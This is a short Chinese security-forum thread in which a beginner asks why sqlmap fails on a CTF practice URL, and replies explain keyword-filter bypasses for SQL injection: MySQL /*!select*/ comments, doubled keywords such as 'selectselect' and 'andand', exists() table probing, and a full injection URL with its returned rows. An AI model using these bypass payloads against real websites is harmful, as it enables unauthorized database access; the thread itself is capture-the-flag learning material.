首页
社区
课程
招聘
[求助] 最简单的sql注入问题
发表于: 2017-5-16 17:05 2573

[求助] 最简单的sql注入问题

2017-5-16 17:05
2573

http://ctf5.shiyanbar.com/423/web/?id=1  这个用sqlmap
无发分析 GET parameter 'id' does not seem to be injectable



初学者,求解,不胜感激。


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (4)
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
被过滤了,不能直接sqlmap,先手工看下
2017-5-16 17:09
0
雪    币: 30
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
那我就不可以得到所有的表了  是吧?  有什么方式么
2017-5-16 17:13
0
雪    币: 4
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
http://www.shiyanbar.com/questions/907有解题思路
使用/*!select*/绕过过滤,使用exists判断表,使用联合查询查询数据。生产环境里面不会有这样的数据库环境。
如果不清楚就百度一下mysql  /*!*/和mysql  exists函数,联合查询应该都会的
2017-5-24 10:59
0
雪    币: 4
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5

刚刚贴了这个攻略,不过不算是自己绕过的。刚刚我发现将被过滤的关键字改成selectselect  (注意空格)也是可以成功的
使用1'  and  1=1  or  ''='      返回
You  have  an  error  in  your  SQL  syntax;  check  the  manual  that  corresponds  to  your  MySQL  server  version  for  the  right  syntax  to  use  near  '1=1  or  ''='''  at  line  1。因为and被过滤掉
使用1'  andand%20%201=1  or''='      返回
ID:  1'  and  1=1  or''='
name:  baloteli

ID:  1'  and  1=1  or''='
name:  kanawaluo

ID:  1'  and  1=1  or''='
name:  dengdeng
这里将空格写成%20是为了明显的显示出来需要两个空格
http://ctf5.shiyanbar.com/423/web/?id='  or  exists  (selectselect    *  fromfrom    admin)    andand    ''='

2017-5-24 11:18
0
游客
登录 | 注册 方可回帖
返回
//